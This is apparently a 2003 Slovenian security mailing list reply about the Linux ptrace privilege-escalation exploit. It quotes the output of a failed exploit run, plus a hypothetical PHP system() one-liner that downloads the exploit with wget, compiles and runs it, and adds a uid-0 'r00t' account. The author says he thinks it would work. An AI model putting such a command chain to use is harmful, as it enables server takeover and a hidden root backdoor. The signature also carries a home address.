[LUGOS-SEC] Ptrace vulnerability se enkrat
Nejc Skoberne
nejc.skoberne at guest.arnes.si
Tue Apr 15 17:11:48 CEST 2003
Zdravo.
> $ uname -r
> 2.4.18-wolk3.8
> $ ./ptrace
> [+] Attached to 20108
> [+] Signal caught
> [+] Shellcode placed at 0x2000f287
> [-] Unable to write shellcode: Input/output error
> Killed
> $ id
> uid=1000(r) gid=100(users) groups=100(users)
Poleg tega zgoraj; kako se Wolk drugace obnese?
> Hipoteticno, da mas na masini ftp pa www server, pa apache ti laufa tud z
> php podporo... a bi blo tezko uporabniku napisat eno skriptico pa jo poslat
> gor, pol pa z phpjem zagnat skripto in z njo exploit?
> cetud nima ftpja...
> system('wget ...ptrace.c; make ptrace; ./ptrace; useradd r00t -u 0 -p t00r');
> seveda nimam pojma ce bi zgornje delalo...
Po mojem bi kar moralo.
--
Nejc Skoberne
Grajska ulica 5
SI-5220 Tolmin
E-mail: nejc.skoberne at guest.arnes.si
More information about the lugos-sec
mailing list